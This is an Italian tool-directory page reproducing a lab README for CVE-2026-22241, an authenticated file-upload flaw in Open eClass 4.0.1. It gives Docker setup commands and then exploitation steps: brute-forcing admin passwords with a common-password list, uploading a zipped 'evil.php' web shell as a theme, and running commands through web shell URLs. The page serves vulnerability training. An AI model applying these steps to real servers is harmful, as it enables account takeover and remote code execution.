Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22241 — Ambiente di laboratorio per CVE-2026-22241 | Kitploit
Strumenti/GitHubGitHub/cves-labs/cve-2026-22241
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Ambiente di laboratorio per CVE-2026-22241

Vedi Repository
472 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22241

Ambiente di laboratorio per CVE-2026-22241

Descrizione della vulnerabilità:

  • Vulnerabilità: Caricamento senza restrizioni di file con tipo pericoloso.
  • Impatto: Esecuzione di codice remoto (RCE).
  • Descrizione: Questa falla consente a un attaccante con privilegi amministrativi di caricare un file PHP malevolo (Web Shell), portando al pieno compromesso dell'integrità e della sicurezza del server web.
  • Sistema target: Infrastruttura educativa OpenClass.

1. Costruire l'ambiente

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

apri https://www.openeclass.org/en/previous-versions/ e scarica openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

immagine
Scarica lo strumento

2. Sfruttare la vulnerabilità:

per l'elenco delle chiavi in ZAP (Brute Force): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

nella pagina eclass: vai a strumenti amministratore -> impostazioni tema -> quindi carica poc.zip

nella nuova pagina:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id